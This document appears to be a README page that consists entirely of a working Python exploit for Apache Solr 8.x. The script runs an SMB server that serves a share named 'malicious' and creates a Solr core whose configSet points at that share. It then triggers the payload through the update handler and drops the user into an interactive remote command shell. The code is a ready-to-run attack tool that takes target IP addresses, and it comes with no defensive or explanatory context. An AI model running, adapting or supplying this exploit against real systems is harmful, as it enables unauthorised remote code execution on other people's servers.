README.md
Rendering markdown...
#!/usr/bin/env python3
import requests
import time
import sys
import argparse
import random
import string
import threading
import socket
from pathlib import Path
from impacket import smbserver
def generate_random_chars(length=8):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
def get_local_ip():
try:
# Connect to a dummy address to determine local IP
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception:
return "127.0.0.1"
def start_smb_server(share_name="malicious", port=445):
def run_server():
try:
files_path = str(Path("files").absolute())
# Create SMB server instance
server = smbserver.SimpleSMBServer(listenAddress="0.0.0.0", listenPort=port)
server.addShare(share_name.upper(), files_path)
server.setSMB2Support(True)
server.start()
except Exception as e:
print(f"[!] Error starting SMB server: {e}")
# Start server in background thread
server_thread = threading.Thread(target=run_server, daemon=True)
server_thread.start()
time.sleep(2)
return server_thread
def create_solr_core(host, port, smb_host, share_name):
"""
Create Solr core that pulls malicious config from SMB server.
"""
base_url = f"http://{host}:{port}"
endpoint = "/solr/admin/cores"
# Generate random core name
core_name = f"exploit_core_{generate_random_chars()}"
# UNC path to our malicious SMB share
malicious_configset = f"//{smb_host}/{share_name}"
params = {
'_': int(time.time() * 1000),
'action': 'CREATE',
'configSet': malicious_configset,
'name': core_name,
'wt': 'json'
}
headers = {
'X-Requested-With': 'XMLHttpRequest',
'Accept-Language': 'en-US,en;q=0.9',
'Accept': 'application/json, text/plain, */*',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36',
'Accept-Encoding': 'gzip, deflate, br',
'Connection': 'keep-alive'
}
try:
print(f"[*] Sending core creation request to: {base_url}{endpoint}")
response = requests.get(
f"{base_url}{endpoint}",
params=params,
headers=headers,
timeout=30
)
print(f"[*] Response Status Code: {response.status_code}")
# Parse JSON response if possible
try:
json_response = response.json()
if 'error' in json_response:
print(f"[!] Error creating core: {json_response['error']}")
return False, None
else:
print(f"[*] Core '{core_name}' created successfully!")
return True, core_name
except ValueError:
print(f"[!] Non-JSON response: {response.text}")
return False, None
except requests.exceptions.RequestException as e:
print(f"[!] Request failed: {e}")
return False, None
def trigger_payload(host, port, core_name):
"""
Trigger the malicious payload by sending a request to the update handler.
"""
print(f"[*] Triggering payload execution")
base_url = f"http://{host}:{port}"
endpoint = f"/solr/{core_name}/update"
# Simple document to trigger the update processor
payload_data = '''<?xml version="1.0" encoding="UTF-8"?>
<add>
<doc>
<field name="id">exploit_trigger</field>
<field name="title">Exploit Trigger</field>
</doc>
</add>'''
headers = {
'Content-Type': 'application/xml',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36'
}
try:
print(f"[*] Sending payload to: {base_url}{endpoint}")
response = requests.post(
f"{base_url}{endpoint}",
data=payload_data,
headers=headers,
params={ 'wt': 'json', 'cmd': 'whoami' },
timeout=30
)
if response.status_code == 200:
print(f"[*] Payload executed successfully!")
# Start interactive shell after successful test
interactive_shell(host, port, core_name)
return True
else:
print(f"[!] Payload execution may have failed")
return False
except requests.exceptions.RequestException as e:
print(f"[!] Request failed: {e}")
return False
def execute_command(host, port, core_name, command):
base_url = f"http://{host}:{port}"
endpoint = f"/solr/{core_name}/update"
payload_data = '{"add": {"doc": {"id": "interactive", "title": "Interactive"}}}'
headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0' }
try:
resp = requests.post(
f"{base_url}{endpoint}",
data=payload_data,
headers=headers,
params={ 'wt': 'json', 'cmd': command },
timeout=30
)
if resp.status_code != 200:
return False, f"HTTP {resp.status_code}", None
try:
data = resp.json()
stdout = data.get('stdout', '')
stderr = data.get('stderr', '')
exit_code = data.get('exit_code', 0)
status = data.get('status', '')
return True, { 'stdout': stdout, 'stderr': stderr, 'exit_code': exit_code, 'status': status }, data
except Exception:
return False, "JSON parse failed", None
except Exception as e:
return False, str(e), None
def interactive_shell(host, port, core_name):
while True:
try:
cmd = input("\nsolr> ").strip()
if not cmd:
continue
if cmd.lower() in ('exit','quit'):
print("[*] exiting shell...")
break
ok, result, raw = execute_command(host, port, core_name, cmd)
if ok:
print(f"[+] exit_code: {result['exit_code']}, status: {result['status']}")
if result['stdout']:
print("--- stdout ---")
print(result['stdout'].rstrip())
if result['stderr']:
print("--- stderr ---")
print(result['stderr'].rstrip())
else:
print(f"[!] command failed: {result}")
except KeyboardInterrupt:
print("\n[*] interrupted")
break
def parse_args():
parser = argparse.ArgumentParser(
description="Solr 8.x Exploit Chain - configSet core creation via SMB",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s 192.168.35.31
%(prog)s 10.0.0.1 --port 8983
%(prog)s 192.168.1.100 --smb-port 445 --smb-host 192.168.1.50
"""
)
parser.add_argument('target_host', help='Target Solr server IP address')
parser.add_argument('--port', '-p', type=int, default=8983, help='Solr server port (default: 8983)')
parser.add_argument('--smb-host', help='SMB server IP (default: auto-detect local IP)')
parser.add_argument('--smb-port', type=int, default=445, help='SMB server port (default: 445)')
parser.add_argument('--share-name', default='malicious', help='SMB share name (default: malicious)')
return parser.parse_args()
def main():
args = parse_args()
print(f"[*] Target: {args.target_host}:{args.port}")
smb_host = args.smb_host or get_local_ip()
print(f"[*] SMB Server: {smb_host}:{args.smb_port}")
print(f"[*] Share Name: {args.share_name}")
try:
# Start SMB server
print(f"\n[*] Starting SMB Server on {smb_host}:{args.smb_port}")
server_thread = start_smb_server(args.share_name, args.smb_port)
print("[*] Waiting for SMB server to start...")
time.sleep(3)
# Create malicious Solr core
print(f"\n[*] Creating Solr Core")
success, core_name = create_solr_core(args.target_host, args.port, smb_host, args.share_name)
if not success:
print("[!] Failed to create Solr core!")
return False
# Trigger payload execution
print(f"\n[*] Triggering Payload")
trigger_payload(args.target_host, args.port, core_name)
# Keep SMB server running for a bit
time.sleep(30)
return True
except Exception as e:
print(f"\n[!] Exploit failed: {e}")
return False
if __name__ == "__main__":
main()